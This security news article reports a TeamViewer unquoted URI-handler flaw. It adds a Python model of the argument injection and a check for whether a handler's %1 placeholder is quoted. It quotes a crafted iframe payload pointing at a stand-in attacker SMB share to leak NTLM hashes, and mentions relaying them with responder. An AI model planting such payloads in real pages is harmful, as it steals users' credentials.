
TeamViewer is a popular software application for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.

The vulnerability, classified as an “Unquoted URI handler”, could be triggered by tricking the victims into visiting a malicious web site. It was discovered by the researcher Jeffrey Hofmann from Praetorian, and it resides in the way TeamViewer quotes its custom URI handlers. The expert found that the issue could allow an attacker to force the software to relay an NTLM authentication request to the attacker’s system.

The issue in TeamViewer’s URI scheme allows a web page crafted by the attacker to trick the application installed on the victim’s system into initiating a connection to an attacker-owned remote SMB share. This means that the SMB authentication process will leak the system’s username and the NTLMv2 hashed version of the password to the attackers.

The attacker could embed a malicious iframe on a website and then trick victims into visiting that malicious URL. Upon clicking the link shared with the victims, TeamViewer will automatically launch its Windows desktop client and open the remote SMB share.

“An attacker could embed a malicious iframe in a website with a crafted URL ( iframe src='teamviewer10: -play \\attacker-IP\share\s') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw. “Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

The vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. The TeamViewer project has fixed the issue by quoting the parameters passed by the affected URI handlers.
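The following is an added example, not code from the article or from TeamViewer, that models the root cause described above and the check a defender would run against a URI-handler registration: whether the %1 placeholder in the handler's command template is quoted. The command templates, program path and argument splitter are constructed for illustration; the URI is the one quoted in the article.

```python
"""Added example: why an unquoted URI-handler template lets a web page inject
extra command-line arguments, and how to check a template for that defect.

Windows registers a custom scheme under HKCR\<scheme>\shell\open\command with
a template in which %1 is replaced by the full URI. The templates and the
program path below are constructed, not TeamViewer's real registry values."""

# Constructed templates: the weak form leaves %1 bare, the fixed form quotes it.
UNQUOTED_TEMPLATE = r'"C:\Program Files\App\app.exe" %1'
QUOTED_TEMPLATE = r'"C:\Program Files\App\app.exe" "%1"'

# The crafted URI as described in the article.
CRAFTED_URI = r'teamviewer10: -play \\attacker-IP\share\s'


def parameter_is_quoted(template: str) -> bool:
    """True when every %1 placeholder in the template is wrapped in double quotes."""
    return '%1' in template and template.count('%1') == template.count('"%1"')


def split_windows_args(cmdline: str) -> list:
    """Simplified model of Windows command-line splitting: whitespace separates
    arguments unless it sits inside double quotes. The backslash-before-quote
    escaping rule is omitted; none of the inputs here contain that sequence."""
    args, current, in_quotes, have_token = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
            have_token = True
        elif ch.isspace() and not in_quotes:
            if have_token:
                args.append(''.join(current))
                current, have_token = [], False
        else:
            current.append(ch)
            have_token = True
    if have_token:
        args.append(''.join(current))
    return args


def expand_handler(template: str, uri: str) -> list:
    """Substitute the URI for %1 as the shell does, then split the result into
    the argument vector the program would actually receive."""
    return split_windows_args(template.replace('%1', uri))


if __name__ == '__main__':
    for name, template in (('unquoted', UNQUOTED_TEMPLATE), ('quoted', QUOTED_TEMPLATE)):
        print(name, 'quoted=%s' % parameter_is_quoted(template), expand_handler(template, CRAFTED_URI))
```

With the unquoted template the program receives "-play" and the UNC path as separate arguments; with the quoted template the whole URI arrives as one argument. To audit a real machine, read the template from HKCR\<scheme>\shell\open\command (for example with reg query) and pass it to parameter_is_quoted.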
